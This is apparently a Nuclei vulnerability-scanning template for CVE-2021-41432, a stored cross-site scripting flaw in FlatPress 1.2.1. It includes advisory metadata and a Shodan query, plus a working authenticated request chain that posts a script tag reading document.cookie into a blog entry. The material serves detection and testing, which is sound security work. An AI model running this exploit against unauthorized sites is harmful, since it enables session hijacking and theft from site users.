id: CVE-2021-41432 info: name: FlatPress 1.2.1 - Stored Cross-Site Scripting author: arafatansari severity: medium description: | FlatPress 1.2.1 contains a stored cross-site scripting vulnerability that allows for arbitrary execution of JavaScript commands through blog content. An attacker can possibly steal cookie-based authentication credentials and launch other attacks. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to potential data theft, session hijacking, or defacement of the website. remediation: | Upgrade to the latest version of FlatPress (1.2.2) or apply the provided patch to fix the XSS vulnerability. reference: - https://github.com/flatpressblog/flatpress/issues/88 - https://nvd.nist.gov/vuln/detail/CVE-2021-41432 - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/martinkubecka/CVE-References - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2021-41432 cwe-id: CWE-79 epss-score: 0.00067 epss-percentile: 0.27705 cpe: cpe:2.3:a:flatpress:flatpress:1.2.1:*:*:*:*:*:*:* metadata: verified: true max-request: 4 vendor: flatpress product: flatpress shodan-query: http.html:"Flatpress" tags: cve2021,cve,flatpress,xss,authenticated,oss,intrusive http: - raw: - | POST /login.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykGJmx9vKsePrMkVp ------WebKitFormBoundarykGJmx9vKsePrMkVp Content-Disposition: form-data; name="user" {{username}} ------WebKitFormBoundarykGJmx9vKsePrMkVp Content-Disposition: form-data; name="pass" {{password}} ------WebKitFormBoundarykGJmx9vKsePrMkVp Content-Disposition: form-data; name="submit" Login ------WebKitFormBoundarykGJmx9vKsePrMkVp-- - | GET /admin.php?p=entry&action=write HTTP/1.1 Host: {{Hostname}} - | POST /admin.php?p=entry&action=write HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _wpnonce={{nonce}}&_wp_http_referer=%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=abcd×tamp=&entry=&attachselect=--&imageselect=--&content=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&save=Publish - | GET /index.php/2022/10 HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - contains(body_4, '
') - contains(body_4, 'FlatPress') - contains(header_4, 'text/html') - status_code_4 == 200 condition: and extractors: - type: regex name: nonce group: 1 regex: - name="_wpnonce" value="([0-9a-z]+)" /> internal: true part: body # digest: 490a00463044022012ed36398f3a3adcb31e49e199e687115b484c759fd6cd62c37427c20c9e9e6402203afca5bfd1f61846e94feb44fc4487b7653f647f3f710f3d444859f1386a7c58:922c64590222798bb761d5b6d8e72950